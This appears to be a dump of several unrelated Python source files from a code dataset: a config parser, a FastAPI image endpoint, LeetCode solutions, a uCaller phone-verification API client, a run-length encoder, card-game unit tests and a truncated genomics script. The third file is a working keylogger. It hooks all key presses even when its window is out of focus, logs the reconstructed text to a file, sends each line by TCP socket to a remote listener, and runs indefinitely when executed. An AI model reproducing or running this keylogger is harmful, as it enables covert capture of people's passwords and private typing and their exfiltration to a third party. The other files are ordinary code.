content
stringlengths 5
1.05M
|
---|
import os
from configparser import ConfigParser
import logging
log = logging.getLogger(__name__)
def parsing():
# default values
cfg = {
'imgext': '.png, .jpg, .jpeg, .tiff, .bmp, .gif',
'audext': '.wav, .mp3, .flac, .m4a',
'separator': '-, .',
'ssr': '6',
'show_search_result': '0',
'codec': 'mpeg4',
'outext': '.mp4',
'threads': '4',
'fps': '1'
}
file = os.path.join(os.path.dirname(__file__), 'config.ini')
if os.path.exists(file):
pass
else:
lines = [
"[extensions]",
"; image extensions",
"imgext = .png, .jpg, .jpeg, .tiff, .bmp, .gif",
"; Audio extensions",
"audext = .wav, .mp3, .flac, .m4a",
"\n",
"; parsing tracknumber options",
"[parsing]",
"; separators:",
"separator = -, .",
"; separator_search_range:",
"ssr = 6",
"; show separator_search_result on debug mode (0 false 1 true):" ,
"show_search_result = 0",
"\n",
"[output]",
"; output codec:",
"codec = mpeg4",
"; output extension:",
"outext = .mp4",
"; output threads:",
"threads = 4",
"; output fps:",
"fps = 1"
]
with open(file, 'w') as w:
w.write('\n'.join(line for line in lines))
parser = ConfigParser()
parser.read(file)
# unpacking sections
sections = [*parser.sections()]
for section in sections:
for key in parser[section]:
if key in ['imgext', 'audext']:
cfg[key] = tuple(value.strip() for value in cfg[key].split(','))
elif key == 'separator':
## separator: '-, .' on dict
cfg[key] = parser[section][key].split(',')
cfg[key] = [i.strip() for i in cfg[key]]
if any(separator in '.' for separator in cfg[key]):
cfg[key] = [i.replace('.', '\.') for i in cfg[key]]
cfg[key] = '|'.join(i for i in cfg[key])
elif key in ['ssr', 'show_search_result', 'threads', 'fps']:
cfg[key] = int(parser[section][key])
else:
cfg[key] = parser[section][key]
log.debug(f'Config:\n {cfg}')
return cfg |
from app import main
from typing import Optional
from fastapi import APIRouter, Body, Depends
from starlette import status
from app.api.dependencies.database import get_repository
from app.db.repositories.project1_words import Project1WordsRepository
from app.models.domain.words import Word
from app.services.image_helpers import (
create_bitmap_from_word,
create_bitmap_from_calendar
)
from app.services.calendar_helpers import (
get_calendar_for_this_week
)
from fastapi.responses import StreamingResponse
from app.core.config import settings
import datetime as dt
from app.models.schemas.words import (
WordOutWithIdDate,
WordShortOutUpdate
)
from app.resources import strings
import io
import datetime as dt
router = APIRouter()
def iterfile(path: str):
with open(path, mode="rb") as file_like:
yield from file_like
@router.get(
"/next",
response_model=WordOutWithIdDate,
name="project1_server:get-next-word",
)
async def project1_get_next(
words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
) -> WordOutWithIdDate:
if settings.o365_account:
all_events = get_calendar_for_this_week(settings.o365_account.schedule())
return StreamingResponse(
io.BytesIO(create_bitmap_from_calendar(all_events, output="__buffer")),
media_type="image/jpeg"
)
else:
dictword = await words_repo.get_1_random_dictword()
return dictword
@router.get(
"/next_bitmap",
name="project1_server:get-next-bitmap",
)
async def project1_get_next(
words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
) -> io.BytesIO:
#TODO: next_engine will decide which content will be served at this moment
if (dt.datetime.now().minute % 2 == 0) and settings.o365_account:
all_events = get_calendar_for_this_week(settings.o365_account.schedule())
return StreamingResponse(
io.BytesIO(create_bitmap_from_calendar(all_events, output="__buffer")),
media_type="image/jpeg"
)
else:
dictword = await words_repo.get_1_random_dictword()
if dictword.type==strings.TYPE_STATIC_FILE:
path = strings.PATH_STATIC_FOLDER + dictword.fullword
return StreamingResponse(iterfile(path), media_type="image/jpeg")
else:
return StreamingResponse(
io.BytesIO(create_bitmap_from_word(dictword, output="__buffer")),
media_type="image/jpeg"
)
# @router.get(
# "/next_bitmap_from_file",
# name="project1_server:get-next-bitmap-from-file",
# )
# def project1_get_next_from_file(
# ) -> WordOutWithIdDate:
# return StreamingResponse(
# iterfile(strings.PATH_STATIC_FOLDER + "ausserhalb_1bit.bmp"),
# media_type="image/jpeg"
# )
# @router.get(
# "/",
# response_model=ListOfWordOutWithIdDate,
# name="project1_words:get-words-by-path-query",
# )
# async def get_words_by_path_query(
# word: str,
# words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
# ) -> ListOfWordOutWithIdDate:
# # test = await words_repo.get_all_dictwords(word=word)
# words = await words_repo.get_dictwords_by_word(word=word)
# return ListOfWordOutWithIdDate(words=words)
# @router.get(
# "/{word_id}",
# response_model=WordOutWithIdDate,
# name="project1_words:get-word-by-id-by-query",
# )
# async def get_word_by_id_path_query(
# word_id: int,
# words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
# ) -> WordOutWithIdDate:
# print("here")
# dictword = await words_repo.get_dictword_by_id(id=word_id)
# return dictword
# @router.post(
# "/",
# status_code=status.HTTP_201_CREATED,
# response_model=WordShortOutCreate,
# name="project1_words:create-new-dictword",
# )
# async def create_new_word(
# word_create: Word,
# words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
# # user: User = Depends(get_current_user_authorizer()),
# ) -> WordShortOutCreate:
# word_row_created = await words_repo.create_new_dictword(
# word=word_create.word,
# type=word_create.type,
# fullword=word_create.fullword,
# content=word_create.content,
# )
# return word_row_created
# @router.put(
# "/{word_id}",
# status_code=status.HTTP_201_CREATED,
# response_model=WordShortOutUpdate,
# name="project1_words:update-existing-dictword-by-id",
# )
# async def update_dictword_by_id(
# word_id: int,
# word_update: Word,
# words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
# # user: User = Depends(get_current_user_authorizer()),
# ) -> WordOutWithIdDate:
# word_row_updated = await words_repo.update_dictword_row_by_id(
# id=word_id,
# dictword=word_update
# )
# return word_row_updated
# @router.delete(
# "/{word_id}",
# status_code=status.HTTP_200_OK,
# name="project1_words:delete-dictword-from-db",
# )
# async def delete_dictword_from_db(
# word_id: int,
# words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
# ) -> int:
# r = await words_repo.delete_dictword(id=word_id)
# return {"id": r}
|
from time import sleep, time
from datetime import datetime as dt
from shutil import copy as copyfile
from socket import socket, AF_INET, SOCK_STREAM
import keyboard
from keyboard import KeyboardEvent
try:
from conf import SPECIAL_KEYS, SERVER_ACTIVE, SERVER_ADDR, SERVER_PORT
except ImportError:
print("Could not find conf.py!\nTrying to copy DEFAULT config to conf.py...")
copyfile("./DEFAULT_conf.py", "./conf.py")
from conf import SPECIAL_KEYS, SERVER_ACTIVE, SERVER_ADDR, SERVER_PORT
print("Successful!")
class MyKLogger:
def __init__(self) -> None:
self._keys: list[str] = []
self._special_mappings = SPECIAL_KEYS
def _log_key(self, key_event: KeyboardEvent):
self._keys.append(key_event.name)
if len(self._keys) >= 32 and key_event.name == "enter":
line = self._parse_text()
if SERVER_ACTIVE:
self._send_to_server(line)
self._dump_to_file(line)
def _parse_text(self) -> str:
"""Parses text from logged key-strokes
Returns:
str: Parsed string
"""
line = ""
last = ""
for key in self._keys:
if key in self._special_mappings.keys():
last = self._special_mappings[key]
elif key == "backspace":
if len(last) == 0:
last = " "
line = line[:-len(last)]
last = ""
continue
elif len(key) > 1:
if len(key) == 2 and key[0] == "f":
last = "<"+key+">"
else:
last = ""
else:
last = key
line += last
return line
def _dump_to_file(self, line: str):
with open("./key.log", "a", encoding="UTF-8") as klog_file:
klog_file.write(f"{dt.fromtimestamp(int(time()))}:\n{line}\n")
self._keys = []
def run_logger(self, duration: int):
"""Runs a key logger.
This function is blocking program execution for <duration> seconds!\n
Continues logging keys even when out of focus!
Args:
duration (int): How long the logger will run.
"""
self.start_logger()
sleep(duration)
self.stop_logger()
def start_logger(self):
"""Starts a key logger in the background.
"""
keyboard.on_press(self._log_key)
def stop_logger(self):
"""Stops active logger.
"""
keyboard.unhook_all()
self._dump_to_file()
def _send_to_server(self, line: str):
"""Send parsed line to listener Server
Args:
line (str): Parsed text from keyboard input
"""
line_bytes = line.encode("UTF-8")
with socket(AF_INET, SOCK_STREAM) as sock:
sock.connect((SERVER_ADDR, SERVER_PORT))
sock.sendall(line_bytes)
def __del__(self):
self.stop_logger()
if __name__ == "__main__":
klog = MyKLogger()
klog.start_logger()
while True:
sleep(3600)
|
'''
提莫攻击
在《英雄联盟》的世界中,有一个叫 “提莫” 的英雄,他的攻击可以让敌方英雄艾希(编者注:寒冰射手)进入中毒状态。现在,给出提莫对艾希的攻击时间序列和提莫攻击的中毒持续时间,你需要输出艾希的中毒状态总时长。
你可以认为提莫在给定的时间点进行攻击,并立即使艾希处于中毒状态。
示例1:
输入: [1,4], 2
输出: 4
原因: 第 1 秒初,提莫开始对艾希进行攻击并使其立即中毒。中毒状态会维持 2 秒钟,直到第 2 秒末结束。
第 4 秒初,提莫再次攻击艾希,使得艾希获得另外 2 秒中毒时间。
所以最终输出 4 秒。
示例2:
输入: [1,2], 2
输出: 3
原因: 第 1 秒初,提莫开始对艾希进行攻击并使其立即中毒。中毒状态会维持 2 秒钟,直到第 2 秒末结束。
但是第 2 秒初,提莫再次攻击了已经处于中毒状态的艾希。
由于中毒状态不可叠加,提莫在第 2 秒初的这次攻击会在第 3 秒末结束。
所以最终输出 3 。
提示:
你可以假定时间序列数组的总长度不超过 10000。
你可以假定提莫攻击时间序列中的数字和提莫攻击的中毒持续时间都是非负整数,并且不超过 10,000,000。
'''
from typing import List
'''
思路:数组
设变量endTime为上次攻击后中毒效果结束时间。totalTime为上次攻击后预计总的中毒时间。
截止当前攻击时间curTime会收到的总攻击时间为:
if curTime>=endTime: # 如果当前时间大于等于上次攻击后结束时间,那么本次攻击不会对总中毒时间造成影响
totalTime = totalTime + duration
else: # 如果当前时间早于上次中毒结束时间,本次会影响总中毒时间,需要减掉重叠的时间
totalTime = totalTime - (endTime-curTime) + duration
按照上面的分析,遍历所有攻击时间,累计总中毒时间
时间复杂度:O(n)
空间复杂度:O(1)
'''
class Solution:
def findPoisonedDuration(self, timeSeries: List[int], duration: int) -> int:
totalTime, endTime = 0, 0
for curTime in timeSeries:
if curTime >= endTime: # 如果当前时间大于等于上次攻击后结束时间,那么本次攻击不会对总中毒时间造成影响
totalTime = totalTime + duration
else: # 如果当前时间早于上次中毒结束时间,本次会影响总中毒时间,需要减掉重叠的时间
totalTime = totalTime - (endTime - curTime) + duration
endTime = curTime + duration
return totalTime
s = Solution()
print(s.findPoisonedDuration([1, 4], 2))
print(s.findPoisonedDuration([1, 2], 2))
|
from re import match
import requests
from .exception import SetSession, SetServiceId, SetKey, ParamSetException, GetException
class BaseUCaller:
__REGEX_PHONE = r'^(\+7|7|8)?[\s\-]?\(?[489][0-9]{2}\)?[\s\-]?[0-9]{3}[\s\-]?[0-9]{2}[\s\-]?[0-9]{2}$'
__ORG_URL = "https://ucaller.ru/"
__DOC_URL = "https://ucaller.ru/doc"
__ERROR_UCALLER = {
"0": "Ваш IP адрес заблокирован",
"1": "Не переданы какие-либо требуемые GET параметры",
"2": "Неверная комбинация GET параметров `service_id` и `key`",
"3": "Возникла ошибка при инициализации авторизации (неверный номер телефона или тех. работы)",
"4": "Работа вашего сервиса отключена в настройках",
"5": "[Тестовый режим] Вы не прошли верификацию номера телефона в личном кабинете",
"6": "[Тестовый режим] Баланс бесплатных тестовых авторизаций исчерпан",
"7": "[Тестовый режим] Переданный GET параметр `phone` не разрешен (на него не пройдена верификация)",
"8": "Проверьте максимально допустимую длину передаваемых значений",
"9": "Авторизация для этой страны запрещена настройками географии работы в личном кабинете",
"10": "Этот uCaller id не существует или у вас нет к нему доступа",
"11": "Авторизация не может быть бесплатно повторена, время истекло",
"12": "Авторизация не может быть бесплатно повторена, лимит исчерпан",
"13": "Ошибочная попытка бесплатной инициализации повторной авторизации",
"14": "[Widget] Неверный формат переданного ucaller-response",
"15": "[Widget] Такого ответа ucaller-response не существует",
"16": "[Widget] Виджет отключен в настройках",
"17": "[Widget] Ключи виджета нельзя использовать для API Classic",
"18": "Достигнут лимит в 4 исходящих звонка в минуту или 15 вызовов в день для одного номера",
"1000": "Этот метод API временно недоступен",
"1001": "Ваш аккаунт заблокирован",
"1002": "Недостаточно средств на балансе аккаунта",
"1003": "С этого IP запрещено обращаться к API этого сервиса",
"1004": "Сервис заархивирован",
}
def __init__(
self,
service_id: int,
key: str,
session: requests.Session = None
):
"""
:param service_id: ID of the service you created
:param key: string == 32 characters
:param session: A Requests session. default = None
"""
self.__service_id = service_id
if len(key) > 32:
raise SetKey(
self.__class__.__qualname__,
self.service_id.__name__,
f"[ERROR] длина key > 32 символо: len(key) = {len(key)}",
100,
)
self.__key = key
if session is not None:
self.__session = session
else:
self.__session = requests.Session()
self.__session.headers = {
'ContentType': 'application/json',
'Accept': 'application/json',
'Content-Encoding': 'utf-8'
}
self.__base_url = "https://api.ucaller.ru/"
self.__version_api = "v1.0"
def __doc_uCaller__(self) -> str:
"""
Вернёт ссылку на документацию api uCaller
:return: string with url the documentation api uCaller
"""
return self.__DOC_URL
def __service_url__(self):
"""
Вернёт ссылку на сайт uCaller
:return: string with url the site uCaller
"""
return self.__ORG_URL
@property
def error_codes(self) -> dict:
"""
Вернёт словарь код:значение
:return: dict code:value
"""
return self.__ERROR_UCALLER
@property
def base_url(self) -> str:
return self.__base_url
@base_url.setter
def base_url(self, url: str):
self.__base_url = url
@property
def version_api(self) -> str:
return self.__version_api
@version_api.setter
def version_api(self, version: str):
self.__version_api = version
@property
def regex_phone(self) -> str:
return self.__REGEX_PHONE
@regex_phone.setter
def regex_phone(self, regex: str):
self.__REGEX_PHONE = regex
@property
def service_id(self) -> int:
return self.__service_id
@service_id.setter
def service_id(self, service_id: int):
if service_id == self.__service_id:
raise SetServiceId(
self.__class__.__qualname__,
self.service_id.__name__,
f"[ERROR] id сервиса совпадает с изменяемым id")
else:
self.__service_id = service_id
@property
def key(self) -> str:
"""
Cекретный ключ
:return: string == 32 characters
"""
return self.__key
@key.setter
def key(self, key: str):
"""
Изменение секретного ключа
:param key: string == 32 characters
"""
if len(key) > 32:
raise SetKey(
self.__class__.__qualname__,
self.service_id.__name__,
f"[ERROR] длина key > 32 символо: len(key) = {len(key)}",
)
else:
self.__key = key
@property
def session(self) -> requests.Session:
"""
A Requests session
:return: object requests.Session
"""
return self.__session
@session.setter
def session(self, session: requests.Session = None):
"""
Изменение сессии
:param session: A Requests session
"""
if session is None:
raise SetSession(
self.__class__.__qualname__,
self.session.__name__,
f"[ERROR] Не присвоен объект типа requests.Session")
else:
self.__session = session
@classmethod
def check_phone(cls, phone: str):
if match(cls.__REGEX_PHONE, phone):
return True
return False
@classmethod
def change_phone(cls, phone):
if phone[0] == "+" and phone[1] == "7":
phone = phone[1:]
elif phone[0] == "7":
phone = phone
elif phone[0] == "8":
phone = f"7{phone[1:]}"
else:
phone = f"7{phone[1:]}"
return phone
def check_error_code(self, error_code):
"""
:param error_code: Код ошибки
:return: Вернёт описание либо None
"""
if str(error_code) in self.__ERROR_UCALLER.keys():
return self.__ERROR_UCALLER.get(str(error_code), None)
return None
class APIUCaller(BaseUCaller):
def init_call(self, phone: str, code, client: str = None, unique: str = None, timeout=60) -> dict:
"""
Данный метод позволяет инициализировать авторизацию для пользователя вашего приложения.
URL обращения для инициализации метода: https://api.ucaller.ru/v1.0/initCall
Способ передачи параметров: GET
:param phone: string phone number
:param code: string == 4 characters
:param client: Набор символов До 64 символов
:param unique: Набор символов До 64 символов
:param timeout: timeout request, default = 60 sec
:return: смотрите APIExampleResponse.example_response_init_сall
"""
# /api/0/orders/add?access_token={accessToken}&request_timeout={requestTimeout}
if not self.check_phone(phone=phone):
raise ParamSetException(
self.__class__.__qualname__,
self.init_call.__name__,
f"[ERROR] неверный формат телефона \n+79999999999\n79999999999\n9999999999"
)
if type(code) != str:
raise ParamSetException(
self.__class__.__qualname__,
self.init_call.__name__,
f"[ERROR] code == None"
)
elif len(str(code)) > 4 or len(str(code)) < 4:
raise ParamSetException(
self.__class__.__qualname__,
self.init_call.__name__,
f"[ERROR] Кол-во символов параметра \"code\", больше либо меньше 4"
)
elif str(client) is not None and len(str(client)) > 64:
raise ParamSetException(
self.__class__.__qualname__,
self.init_call.__name__,
f"[ERROR] Кол-во символов параметра \"client\", больше 64"
)
if unique is not None:
if type(unique) != str:
unique = str(unique)
if len(str(unique)) > 64:
raise ParamSetException(
self.__class__.__qualname__,
self.init_call.__name__,
f"[ERROR] Кол-во символов параметра \"unique\", больше 64"
)
phone = self.change_phone(phone)
try:
result = self.session.get(
f"{self.base_url}{self.version_api}/initCall?service_id={self.service_id}&key={self.key}&phone={phone}" +
f"&code={code}{f'&client={client}' if client is not None else ''}" +
f"{f'&unique={unique}' if unique is not None else ''}",
timeout=timeout,
)
return result.json()
except requests.exceptions.RequestException as err:
raise GetException(
self.__class__.__qualname__,
self.init_call.__name__,
f"[ERROR] Не удалось инициализировать авторизацию\n{err}"
)
def init_repeat(self, uid: str, timeout=60) -> dict:
"""
В случае, если ваш пользователь не получает звонок инициализированный методом initCall, вы можете два раза и
совершенно бесплатно инициализировать повторную авторизацию по uCaller ID, который вы получаете в ответе
метода initCall. Повторную авторизацию можно запросить только в течение пяти минут с момента выполнения
основной авторизации методом initCall. Все данные, например `code` или `phone`, совпадают с теми же,
которые были переданы в первом запросе initCall.
URL обращения для инициализации метода: https://api.ucaller.ru/v1.0/initRepeat
Способ передачи параметров: GET
:param uid:
:param timeout: timeout request
:return: смотрите APIExampleResponse.example_response_get_repeat
"""
try:
result = self.session.get(
f"{self.base_url}{self.version_api}/initRepeat?service_id={self.service_id}&key={self.key}&uid={uid}",
timeout=timeout
)
return result.json()
except requests.exceptions.RequestException as err:
raise GetException(
self.__class__.__qualname__,
self.init_repeat.__name__,
f"[ERROR] Не удалось повторить авторизацию\n{err}"
)
def get_info(self, uid: str, timeout=60) -> dict:
"""
Этот метод возвращает развернутую информацию по уже осуществленному uCaller ID.
:param uid: uCaller ID переданный в ответе init_сall
:param timeout: timeout request
:return: смотрите APIExampleResponse.example_response_get_info
"""
try:
result = self.session.get(
f"{self.base_url}{self.version_api}/getInfo?service_id={self.service_id}&key={self.key}&uid={uid}",
timeout=timeout
)
return result.json()
except requests.exceptions.RequestException as err:
raise GetException(
self.__class__.__qualname__,
self.get_info.__name__,
f"[ERROR] Не удалось получить развернутую информацию по уже осуществленному uCaller ID\n{err}"
)
def get_balance(self, timeout=60) -> dict:
"""
Этот метод возвращает информацию по остаточному балансу.
URL обращения для инициализации метода: https://api.ucaller.ru/v1.0/getBalance
Способ передачи параметров: GET
:param timeout: timeout request
:return: смотрите APIExampleResponse.example_response_get_balance
"""
try:
result = self.session.get(
f"{self.base_url}{self.version_api}/getBalance?service_id={self.service_id}&key={self.key}",
timeout=timeout
)
return result.json()
except requests.exceptions.RequestException as err:
raise GetException(
self.__class__.__qualname__,
self.get_balance.__name__,
f"[ERROR] Не удалось получить информацию по остаточному балансу\n{err}"
)
def get_service(self, timeout=60) -> dict:
"""
Этот метод возвращает информацию по сервису.
URL обращения для инициализации метода: https://api.ucaller.ru/v1.0/getService
Способ передачи параметров: GET
:param timeout: timeout request
:return: смотрите APIExampleResponse.example_response_get_service
"""
try:
result = self.session.get(
f"{self.base_url}{self.version_api}/getService?service_id={self.service_id}&key={self.key}",
timeout=timeout
)
return result.json()
except requests.exceptions.RequestException as err:
raise GetException(
self.__class__.__qualname__,
self.get_service.__name__,
f"[ERROR] Не удалось получить информацию по остаточному балансу\n{err}"
)
class APIExampleResponse:
# noinspection PyMethodMayBeStatic
def example_response_get_info(self) -> dict:
"""
Вернёт пример ответа метода get_info
:return: will return an example of the response of the 'get_info' method
"""
return {
"status": True, # true в случае успеха, false в случае неудачи
"ucaller_id": 103000, # запрошенный uCaller ID
"init_time": 1556617525, # время, когда была инициализирована авторизация
"call_status": -1,
# Статус звонка, -1 = информация проверяется (от 1 сек до 1 минуты), 0 = дозвониться не удалось, 1 = звонок осуществлен
"is_repeated": False,
# является ли этот uCaller ID повтором (initRepeat), если да, будет добавлен first_ucaller_id с первым uCaller ID этой цепочки
"repeatable": False, # возможно ли инициализировать бесплатные повторы (initRepeat)
"repeat_times": 2, # Появляется в случае repeatable: true, говорит о количестве возможных повторов
"repeated_ucaller_ids": [103001, 103002], # цепочка uCaller ID инициализированных повторов (initRepeat)
"unique": "f32d7ab0-2695-44ee-a20c-a34262a06b90", # ключ идемпотентности (если был передан)
"client": "nickname", # идентификатор пользователя переданный клиентом (если был передан)
"phone": 79991234567, # номер телефона пользователя, куда мы совершали звонок
"code": 7777, # код авторизации
"country_code": "RU", # ISO код страны пользователя
"country_image": "https://static.ucaller.ru/flag/ru.svg", # изображение флага страны пользователя
"phone_info": [ # информация по телефону, информация может отличаться от примера
{
"operator": "МТС", # Оператор связи
"region": "Республика Татарстан", # регион субъеккта Российской федерации
"mnp": "Мегафон" # Если у номера был сменен оператор - MNP покажет нового оператора
}
],
"cost": 0.3 # сколько стоила эта авторизация клиенту
}
# noinspection PyMethodMayBeStatic
def example_response_init_repeat(self) -> dict:
"""
Вернёт пример ответа метода init_repeat
:return: will return an example of the response of the 'init_repeat' method
"""
return {
"status": True,
"ucaller_id": 103001,
"phone": 79991234567,
"code": 7777,
"client": "nickname",
"unique_request_id": "f32d7ab0-2695-44ee-a20c-a34262a06b90",
"exists": True,
"free_repeated": True, # показывает, что осуществлена повторная авторизация
}
# noinspection PyMethodMayBeStatic
def example_response_init_call(self) -> dict:
"""
Вернёт пример ответа метода init_call
:return: will return an example of the response of the 'init_call' method
"""
return {
"status": True, # True в случае успеха, false в случае неудачи
"ucaller_id": 103000,
# уникальный ID в системе uCaller, который позволит проверять статус и инициализировать метод initRepeat
"phone": 79991234567, # номер телефона, куда мы совершили звонок
"code": 7777, # код, который будет последними цифрами в номере телефона
"client": "nickname", # идентификатор пользователя переданный клиентом
"unique_request_id": "f32d7ab0-2695-44ee-a20c-a34262a06b90",
# появляется только если вами был передан параметр `unique`
"exists": True
# появляется при переданном параметре `unique`, если такой запрос уже был инициализирован ранее
}
# noinspection PyMethodMayBeStatic
def example_response_get_balance(self) -> dict:
"""
Вернёт пример ответа метода get_balance
:return: will return an example of the response of the 'get_balance' method
"""
return {
"status": True, # True в случае успеха, false в случае неудачи
"rub_balance": 84.6, # Остаточный баланс на рублевом счете аккаунта
"bonus_balance": 0, # Остаточный бонусный баланс
"tariff": "startup", # Кодовое значение вашего тарифного плана
"tariff_name": "Старт-ап" # Название тарифного плана
}
# noinspection PyMethodMayBeStatic
def example_response_get_service(self) -> dict:
"""
Вернёт пример ответа метода get_service
:return: will return an example of the response of the 'get_service' method
"""
return {
"status": True, # true в случае успеха, false в случае неудачи
"service_status": 1692, # ID сервиса
"name": "ВКонтакте", # Название сервиса
"creation_time": 1556064401, # Время создания сервиса в unix формате
"last_request": 1556707453, # Время последнего не кэшированного обращения к API сервиса в unix формате
"owner": "[email protected]", # E-mail адрес владельца сервиса
"use_direction": "ВКонтакте приложение", # Информация о том, где будет использоваться сервис
"now_test": True, # Состояние тестового режима на текущий момент
"test_info": {
"test_requests": 89, # Оставшееся количество бесплатных тестовых обращений
"verified_phone": 79991234567 # Верифицированный номер телефона для тестовых обращений
}
}
|
#!/usr/bin/env python3
"""
Author : saminamomtaz <saminamomtaz@localhost>
Date : 2021-11-16
Purpose: Run-length encoding/data compression
"""
import argparse
import os
# --------------------------------------------------
def get_args():
"""Get command-line arguments"""
parser = argparse.ArgumentParser(
description='Run-length encoding/data compression',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('text',
metavar='str',
help='DNA text or file')
args = parser.parse_args()
if os.path.isfile(args.text):
args.text = open(args.text). read().rstrip()
return args
# --------------------------------------------------
def rle(seq):
""" Create RLE """
final = []
count = 1
for ind, base in enumerate(seq):
if ind == len(seq)-1:
final += base
if count > 1:
final += str(count)
elif base == seq[ind+1]:
count = count+1
else:
final += base
if count > 1:
final += str(count)
count = 1
return ''.join(final)
# --------------------------------------------------
def test_rle():
""" Test rle """
assert rle('A') == 'A'
assert rle('ACGT') == 'ACGT'
assert rle('AA') == 'A2'
assert rle('AAAAA') == 'A5'
assert rle('ACCGGGTTTT') == 'AC2G3T4'
# --------------------------------------------------
def main():
"""Make a jazz noise here"""
args = get_args()
for seq in args.text.splitlines():
print(rle(seq))
# --------------------------------------------------
if __name__ == '__main__':
main()
|
class Solution:
def fourSumCount(self, A: List[int], B: List[int], C: List[int], D: List[int]) -> int:
dicA = {}
dicB = {}
dicC = {}
dicD = {}
for i in A:
if i in dicA.keys():
dicA[i] += 1
else:
dicA[i] = 1;
for i in B:
for j in dicA.keys():
if i+j in dicB:
dicB[i+j] += dicA[j]
else:
dicB[i+j] = dicA[j]
for i in C:
if i in dicC.keys():
dicC[i] += 1
else:
dicC[i] = 1;
for i in D:
for j in dicC.keys():
if i+j in dicD:
dicD[i+j] += dicC[j]
else:
dicD[i+j] = dicC[j]
ans = 0;
for i in dicD.keys():
if -i in dicB.keys():
ans += dicB[-i]*dicD[i]
return ans
|
import unittest
from QuattroComponents.Player import Anonymous_player
from QuattroComponents.Card import Card
from TestModule.GetMethodName import get_method_name_decorator
from collections import deque
def reset_player_attributes(anonymous: Anonymous_player):
anonymous.player1_changed = False
anonymous.player2_changed = False
class AnonymousPlayerTest(unittest.TestCase):
# this card doesn't care
origin_card = Card(number=1, color="green", isOpen=False)
method_names = set()
@get_method_name_decorator
def test_correct_zero_card_change(self):
# Zero idx 0
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=0, color="zero", isOpen=False),
Card(number=1, color="red", isOpen=False),
Card(number=2, color="red", isOpen=False)
])
opened_deck = deque([])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card, opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
# Zero idx 1
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="red", isOpen=False),
Card(number=0, color="zero", isOpen=False),
Card(number=2, color="red", isOpen=False)
])
opened_deck = deque([])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card, opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
# Zero idx 2
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="red", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=0, color="zero", isOpen=False)
])
opened_deck = deque([])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
# with opened_deck
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="red", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=0, color="zero", isOpen=False)
])
opened_deck = deque([Card(number=3, color="blue", isOpen=False)])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
@get_method_name_decorator
def test_made_quattro_card_change(self):
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="blue", isOpen=False),
Card(number=1, color="yellow", isOpen=False),
Card(number=1, color="red", isOpen=False)
])
opened_deck = deque([
Card(number=6, color="blue", isOpen=True),
Card(number=6, color="red", isOpen=True),
Card(number=6, color="green", isOpen=True)
])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 1)
self.assertEqual(return_card.color, 'yellow')
self.assertTrue(anonymous.player2_changed)
@get_method_name_decorator
def test_top_card_change(self):
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="blue", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=1, color="red", isOpen=False)
])
opened_deck = deque([
Card(number=6, color="blue", isOpen=True),
Card(number=6, color="red", isOpen=True),
Card(number=6, color="green", isOpen=True)
])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 2)
self.assertEqual(return_card.color, 'red')
self.assertTrue(anonymous.player2_changed)
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous.user_deck = [
Card(number=2, color="blue", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=1, color="red", isOpen=False)
]
opened_deck = deque([
Card(number=6, color="blue", isOpen=True),
Card(number=6, color="red", isOpen=True),
Card(number=6, color="green", isOpen=True)
])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 2)
self.assertEqual(return_card.color, 'red')
self.assertTrue(anonymous.player2_changed)
|
import gzip
import re
import os
import time
from sys import argv
import concurrent.futures
import math
# Keep track of when the script began
startTime = time.time()
char = '\n' + ('*' * 70) + '\n'
# Argv information
inputFile = argv[1]
pathToFiles = argv[2]
numCores = int(argv[3])
if pathToFiles.endswith("/"):
pathToFiles = pathToFiles[0:-1]
# Create a list of proband files that need to have non-variant sites removed. Create a list of parent files that need sites removed
probandDict = {}
familyDict = {}
with open(inputFile) as tsvFile:
header = tsvFile.readline()
header = header.rstrip().split("\t")
fileNameIndex = header.index("file_name")
familyIdIndex = header.index("family_id")
probandIndex = header.index("proband")
sampleIdIndex = header.index("sample_id")
for sample in tsvFile:
sample = sample.rstrip().split("\t")
if os.path.exists(f"{pathToFiles}/{sample[fileNameIndex]}"):
if sample[probandIndex] == "Yes":
